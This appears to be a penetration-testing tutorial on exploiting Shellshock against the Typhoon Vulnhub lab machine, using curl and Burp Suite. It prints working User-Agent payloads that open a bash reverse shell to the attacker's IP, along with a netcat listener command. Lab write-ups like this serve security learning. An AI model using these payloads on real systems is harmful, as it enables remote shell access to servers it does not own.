
In this tutorial I show you how to exploit the infamous Shellshock vulnerability. I cover how to do so without Metasploit and how to do it using Burp Suite.

Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.


What Is The Shellshock Vulnerability?

Bash imports shell functions from environment variables, and vulnerable versions (CVE-2014-6271, disclosed in September 2014) keep parsing past the end of the function body, so any commands appended after the closing brace are executed the moment bash starts. A CGI web server copies request headers such as User-Agent into environment variables before running the CGI script, so a request header that begins with () { :; }; reaches bash and the trailing commands run on the server with the privileges of the web server user.

What You Need

  • Typhoon 1.02 Vulnhub Machine – VirtualBox
  • Kali Linux Virtual Machine – VirtualBox

Recon

Using nikto I enumerate the known vulnerabilities on the target’s web server.


Nikto reports that the CGI script on the target is likely vulnerable to Shellshock. I use the following command to exploit it.

Exploit The Shellshock Vulnerability

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.250/1234 0>&1' http://10.0.0.190/cgi-bin/test.sh

The User-Agent header carries a bash one-liner reverse shell. Before sending it, start a listener on the Kali machine (for example nc -lvnp 1234) and make sure the IP address and port in the payload match that listener; when the CGI script runs, bash executes the trailing command and connects back with an interactive shell. Note that the CGI script never gets to send a valid response, so curl will appear to hang while the reverse shell is alive.

Exploit Shellshock Using Burp

You have undoubtedly read through my tutorial for setting up Burp the easy way and that means you are only one click away from being ready for the next step.

Look closely at the image below and see what I have done.

I turn on the FoxyProxy proxy as shown in the tutorial I just mentioned. Next I open http://typhoon-ip/cgi-bin/test.sh, the script flagged in the nikto scan results, and open up Burp Suite.

I then send the request to Repeater (Ctrl + R), and now I am poised to alter the request before sending it on.

In the User-Agent header I have put the bash one-liner reverse shell to be executed on the target. As with the curl version, the listener must already be running and the IP and port must match it.

User-Agent: () { :; };/bin/bash -i >& /dev/tcp/10.0.0.2/1234 0>&1

So that is how you exploit the Shellshock vulnerability using Burp Suite; in this case we are using the Typhoon Vulnhub machine to test our exploit on.
